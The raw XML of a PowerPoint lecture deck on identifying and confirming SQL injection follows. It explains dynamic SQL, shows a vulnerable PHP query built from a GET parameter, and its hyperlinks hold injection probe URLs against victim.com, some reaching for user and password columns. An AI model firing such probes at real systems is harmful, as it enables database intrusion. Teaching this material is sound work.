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44" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="352" r:id="rId6"/>
    <p:sldId id="258" r:id="rId7"/>
    <p:sldId id="341" r:id="rId8"/>
    <p:sldId id="349" r:id="rId9"/>
    <p:sldId id="350" r:id="rId10"/>
    <p:sldId id="351" r:id="rId11"/>
    <p:sldId id="342" r:id="rId12"/>
    <p:sldId id="353" r:id="rId13"/>
    <p:sldId id="264" r:id="rId14"/>
    <p:sldId id="261" r:id="rId15"/>
    <p:sldId id="262" r:id="rId16"/>
    <p:sldId id="266" r:id="rId17"/>
    <p:sldId id="270"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8" r:id="rId33"/>
    <p:sldId id="292" r:id="rId34"/>
    <p:sldId id="293" r:id="rId35"/>
    <p:sldId id="294" r:id="rId36"/>
    <p:sldId id="298" r:id="rId37"/>
    <p:sldId id="300" r:id="rId38"/>
    <p:sldId id="301" r:id="rId39"/>
    <p:sldId id="302" r:id="rId40"/>
    <p:sldId id="303" r:id="rId41"/>
    <p:sldId id="304" r:id="rId42"/>
    <p:sldId id="305" r:id="rId43"/>
    <p:sldId id="306" r:id="rId44"/>
    <p:sldId id="308" r:id="rId45"/>
    <p:sldId id="309" r:id="rId46"/>
    <p:sldId id="310" r:id="rId47"/>
    <p:sldId id="311" r:id="rId48"/>
    <p:sldId id="312" r:id="rId49"/>
    <p:sldId id="313" r:id="rId50"/>
    <p:sldId id="314" r:id="rId51"/>
    <p:sldId id="315" r:id="rId52"/>
    <p:sldId id="316" r:id="rId53"/>
    <p:sldId id="317" r:id="rId54"/>
    <p:sldId id="319" r:id="rId55"/>
    <p:sldId id="322" r:id="rId56"/>
    <p:sldId id="323" r:id="rId57"/>
    <p:sldId id="325" r:id="rId58"/>
    <p:sldId id="326" r:id="rId59"/>
    <p:sldId id="328" r:id="rId60"/>
    <p:sldId id="329" r:id="rId61"/>
    <p:sldId id="331" r:id="rId62"/>
    <p:sldId id="332" r:id="rId63"/>
    <p:sldId id="354" r:id="rId64"/>
    <p:sldId id="340"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6" autoAdjust="0"/>
    <p:restoredTop sz="94646" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="94" d="100"/>
          <a:sy n="94" d="100"/>
        </p:scale>
        <p:origin x="728" y="184"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="3864"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="5788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A9B540C-44DA-4F69-89C9-7C84606640D3}"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victim.com/products.php?val=100"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victim.com/products.php?val=100"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victim.com/cms/login.php?username=foo&amp;password=bar"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victim.com/cms/login.php?username=foo&amp;password=ba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gpo.gov/fdsys/pkg/PLAW-107publ56/pdf/PLAW-107publ56.pdf" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.justice.gov/criminal/cybercrime/docs/ccmanual.pdf" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.legislation.gov.uk/ukpga/2006/48/contents" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.legislation.gov.uk/ukpga/1990/18/conten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victim.com/user_details.php?table=users&amp;column1=user&amp;column2=password&amp;column3=Super_priv"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victim.com/form.php?form=form2&amp;param=" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.victim.com/form.php?form=form1&amp;para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victim.com/showproducts.php?category=cars" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.victim.com/showproducts.php?category=bikes" TargetMode="Externa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victim.com/showproducts.php?category=attacker" TargetMode="Externa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victim.com/showproducts.php?category=bi%E2%80%99%E2%80%99kes" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.victim.com/showproducts.php?category=bi%E2%80%99+%E2%80%99kes" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.victim.com/showproducts.php?category=bik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victim.com/showproducts.aspx?category=attacker%E2%80%99" TargetMode="Externa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victim.com/showproduct.aspx?id=attacker" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.victim.com/showproduct.aspx?id=2" TargetMode="Externa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victim.com/showproducts.aspx?category=bikes%E2%80%99%C2%A0and%C2%A01=0/user;--" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.victim.com/showproducts.aspx?category=bikes%E2%80%99and%201=0/@@version;--" TargetMode="Externa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victim.com/showproducts.aspx?category=bikes%E2%80%99GROUP%20BY%20productid%20having%20%E2%80%981%E2%80%98=%E2%80%991" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.victim.com/showproducts.aspx?category=bikes%E2%80%99having1%E2%80%99=%E2%80%991"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en.wikipedia.org/wiki/SQL_injection%23Examples" TargetMode="Externa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victim.com/showproducts.aspx?category=bikes%E2%80%99and%201=0/name;--" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.victim.com/showproducts.aspx?category=bikes%E2%80%99GROUP%20BY%20productid,%20name%20having%20%E2%80%981%E2%80%99=%E2%80%991" TargetMode="Externa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www.victim.com/logon.aspx?username=test%E2%80%99and%20User%20not%20in%20(%E2%80%98Admin%E2%80%99)%20and%201=0/User%20and%201%E2%80%99=%E2%80%991" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.victim.com/logon.aspx?username=test%C2%A0%E2%80%99%20and%201=0/Password%20and%201%E2%80%99=%E2%80%991" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.victim.com/logon.aspx?username=test%E2%80%99%C2%A0and%201=0/User%20and%201%E2%80%99=%E2%80%991" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.victim.com/logon.aspx?username=test%E2%80%99GROUP%20BY%20User%20having%20%E2%80%981%E2%80%99=%E2%80%991" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.victim.com/logon.aspx?username=test%E2%80%99having1%E2%80%99=%E2%80%991"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130426"/>
            <a:ext cx="8077200" cy="3584575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="6700" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Identifying and confirming SQL injection vulnerabilities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15962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0"/>
              <a:t>Dynamic SQL Statements</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="1219200"/>
            <a:ext cx="8610600" cy="5410200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SQL injection relies on the fact that Web applications use dynamic SQL statements in order to take in a user’s input. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A dynamic SQL statement is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL statement that is generated on the fly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> by an application. Dynamic SQL allows you to build your code as text and process it at runtime.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>By contrast, a static SQL statement is a statement that is built by the user and the full text of the statement is known at compilation. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>With dynamic SQL statements, developers build applications that handle most of the SQL code in real time, because the full query is not known until the user inputs the information. If the user’s input is not validated, an attacker could input malicious code, rather than search criteria, into the input fields of the form. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Securing your application = ensuring your dynamic SQL cannot be altered.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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8229600" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0"/>
              <a:t>Note before we start: Differentiating Numbers and Strings</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="1676400"/>
            <a:ext cx="8610600" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>The very first thing to note for performing SQL injection is that databases data types are represented in different ways, and we can split them into two groups:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Number: represented without single quotes</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>All the rest: represented with single quotes</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>However, it is possible to represent a numeric value between quotes, and most databases will cast the value to the represented number. Microsoft SQL server is an exception to this norm, as the + operand is overloaded and interpreted as a concatenation. In that particular case the database will understand it as a string representation of a number; for example, ‘2’+‘2’ = ‘22’, not 4.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>Representation of date/timestamp data types in the different databases varies greatly. To avoid these problems most vendors have the option to use format masks (e.g. ‘DD-MM-YYYY’).</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB"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1975" y="160020"/>
            <a:ext cx="9995535" cy="791845"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Understanding SQL Injection – Example </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1461770" y="897890"/>
            <a:ext cx="9053830" cy="5807710"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="37500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0"/>
              <a:t>For example, an online retail store presents a search form that allows you to search for products, and provides an option to refine the results to suit financial budget constraints. To view all products within the store that cost less than £100, you could use the following URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.victim.com/products.php?val=100</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0"/>
              <a:t>The following PHP script illustrates how the user input (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" i="1" dirty="0" err="1"/>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0"/>
              <a:t>) is passed to a dynamically created SQL statement. The code is executed when the URL is requested:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// connect to the database</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$conn = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”,“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username”,“password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”);</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// dynamically build the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> statement with the input</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$query = “SELECT ∗ FROM Products WHERE Price &lt; ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”]’ ”.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  “ORDER BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ProductDescription</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// execute the query against the database</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$result = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($query);</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// iterate through the record set</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>while($row = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_fetch_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($result, MYSQL_ASSOC))</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> // display the results to the browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> echo “Description : {$row[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ProductDescription</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’]} &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;”.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  “Product ID : {$row[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ProductID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’]} &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;”.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  “Price : {$row[‘Price’]} &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;”;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="AutoShape 2" descr="imag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GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 4" descr="image"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
